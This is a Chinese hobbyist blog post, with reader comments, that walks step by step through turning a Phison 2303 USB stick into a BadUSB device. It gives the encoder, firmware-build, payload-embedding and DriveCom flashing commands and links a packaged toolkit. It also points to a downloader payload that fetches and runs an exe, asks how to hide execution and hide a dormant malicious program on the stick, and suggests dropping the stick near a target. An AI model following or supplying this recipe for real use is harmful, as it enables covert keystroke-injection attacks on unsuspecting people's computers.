Badusb初玩步骤记录&疑问探讨

一直在各大常逛的网站看到关于Badusb的文章,顿时觉得很神奇,很高端,于是一直想拥有这么一个邪恶的东西,可是因为2303不是很好找,并且git上的编译写入过程一看就头大,所以一直搁浅了,可是并没放弃,扯远了,扯回来。

(刚才发文章,显示操作异常,所以本来很详细的文,现在简短点写吧)

PS:英文好的同学可以直接去Git看官方教程

PS:发现关于Badusb的详细教程文章国内寥寥无几,大牛们肯定都是在躲着玩..让后来想学的小白怎么办

需要的环境&工具

0.2303芯片的U盘  (废话...)
1.Visual Studio 2012(编译所需工具用,可选安装,我会编译打包好)
2.Java环境  (执行encoder所需)
3..NET framework 4.5(系统自带,没有请到微软官网下载)
4.SDCC  http://sdcc.sourceforge.net   //安装至C:\Program Files\SDCC目录下
5.Duckencoder(编译攻击代码)
6.Burner File BN03V104M.BIN  (2303固件)        
7.Psychson  (Badusb写入工具 https://github.com/adamcaudill/Psychson/)
8.攻击payload  (想要执行的攻击代码)
9.主控芯片查看工具  (可选,查看U盘主控芯片信息)

01.jpg


1.下载&编译攻击代码
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
你可以使用HelloWorld测试,也可以用Downer下载exe并运行(第二次刷入比较麻烦,建议第一次就选好想要的payload

java -jar encoder.jar -i payload.txt -o inject.bin //使用Duckencoder目录下的encoder生成payload为bin

2.生成固件&将攻击代码写入固件

Psychson-master\firmware\build.bat //生成固件

EmbedPayload.exe C:\Psychson-master\inject.bin C:\Psychson-master\firmware\bin\fw.bin //将攻击代码写入生成的固件


3.将生成的固件写入U盘

DriveCom.exe /drive=G /action=SetBootMode //设置U盘模式

DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN //2302固件

DriveCom.exe /drive=G /action=SendFirmware /burner=C:\Psychson-master\BN03V104M.BIN /firmware=C:\Psychson-master\firmware\bi\fw.bin //写入带有攻击代码的固件到芯片中


就不每个都传图了,直接上写入成功的图:

点击查看原图

文件打包下载链接: http://pan.baidu.com/s/1wH4b8 密码: 4vb4

备用下载地址:http://www.jeary.org/badusb.zip

效果演示地址:http://www.jeary.org/badusb.swf  (希望没暴露啥)

疑问讨论:(玩过的大牛,都别躲着玩了,快出来科普问题,或说说猥琐的新姿势..)

1.看漏洞原理,貌似是因为此芯片可编程为其他设备,如Usb键盘,打印机什么的,然后执行代码,那么U盘被编程为了其他设备,是否可以将恶意 exe写入进去,并在插入的时候执行自己存储的exe,而不是执行vbs下载(因为要考虑到内网或没网,执行一个内置并潜伏的程序应该能pass此场景)

2.貌似它只是模拟了键盘去执行命令,那么在没有powershell的环境里如何做到隐藏执行?cmd有点显眼,虽然一闪而过

3.如何即让它可以模拟执行命令又能像正常U盘一样存储东西(比较插上U盘结果没出现盘让人感觉有点不对)听说量产工具可以把U盘量产为不同的用途,不知道是否可以用在此处

end:不想再折腾了。。第一次刷入helloworld成功后还小激动了会,然后发现第二次刷入新的payload出现了错误,在大牛的帮助下才成功使用短接方法重新刷入payload(在没有工具的情况下,拆开U盘橡胶外壳,不要问我是不是咬开的,我徒手撕的..)

感谢90某大神的耐心回答,几个小时之前都没听说过U盘还有短接这东西。。(此文也是参考自他)

下一个可能要感谢“一只猿”了,你们猜为什么

enjoying..(ps:去目(nv)标(shen)那丢U盘吧)

评论(36 Comments)

  1. 如何删除badusb的代码
  2. 博主教坏人
  3. 楼主  2307 能弄吗
    京东的东芝U盘 买回来是2307的
    据说兼容性币2303好?
    • @meteor:可以尝试一下,不过目测不行。支持的芯片列表:https://github.com/brandonlw/Psychson/wiki/Known-Supported-Devices
      • @Jeary:请问这个教程支持与不支持U盘型号,主要是因为什么原因?曾经尝试换上匹配的固件,结果还是失败的。我就在想是不是因为CFW.BIN这个文件的原因,望解答?
  4. 楼主,badusb不用手工吧。?我是小白,看不懂。我的QQ727459283求指导。多谢了
  5. 博主大神,能否共享一下,那个量产工具,现在想改payload
    • @张飞online:改payload可尝试直接刷入,如刷不进去则需要短接
  6. 求2303芯片的U盘
  7. 怎么修改硬件来达到两者共存啊,顺便求个QQ号联系一下
  8. 请加Q  859007438 交流下
  9. 博主我也想玩玩这个badusb,但是实在找不到这款U盘,可否指点您的U盘在哪买的?
    • @hl:电脑城找。
      • @Jeary:博主,我想定制一个,怎么联系你呢
        • @BUCK:跟着教程来即可。
          • @Jeary:教程看得懂,但是想要自己的攻击程序,这个没办法,不会弄
          • @BUCK:重点是payload,Git上有各种,多看几个,就能写出自己的Payload了~
  10. 能留下QQ 交流一下吗?

发表评论